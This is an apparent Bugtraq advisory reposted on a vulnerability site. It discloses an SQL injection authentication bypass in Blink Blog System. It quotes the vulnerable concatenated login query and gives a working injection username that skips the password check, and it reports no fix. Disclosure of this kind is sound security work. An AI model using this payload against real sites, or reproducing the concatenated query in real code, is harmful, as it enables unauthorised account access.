Blink Blog System Authentication Bypass

2009-08-04 / 2009-08-05
Credit: Salvatore Fresta
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

******** Salvatore "drosophila" Fresta ******** [+] Application: Blink Blog System [+] Version: Unknown [+] Website: http://blogink.sourceforge.net [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 03 Aug 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *************************************************** [+] Menu 1) Bugs 2) Code 3) Fix *************************************************** [+] Bugs There are many SQL Injection flaws but I post the only one that allows a guest to bypass the login. - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php, db.php This bug allows a guest to bypass the login. login.php: ... $username = $_POST["nick"]; $password = md5($_POST["password"]); if ($data = $DB->usercheck($username, $password)) ... db.php: function usercheck($username, $password) { $try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" "); ... *************************************************** [+] Code - [A] Authentication Bypass username: root"# password: foo *************************************************** [+] Fix No fix. ***************************************************

References:

http://seclists.org/bugtraq/2009/Aug/0015.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top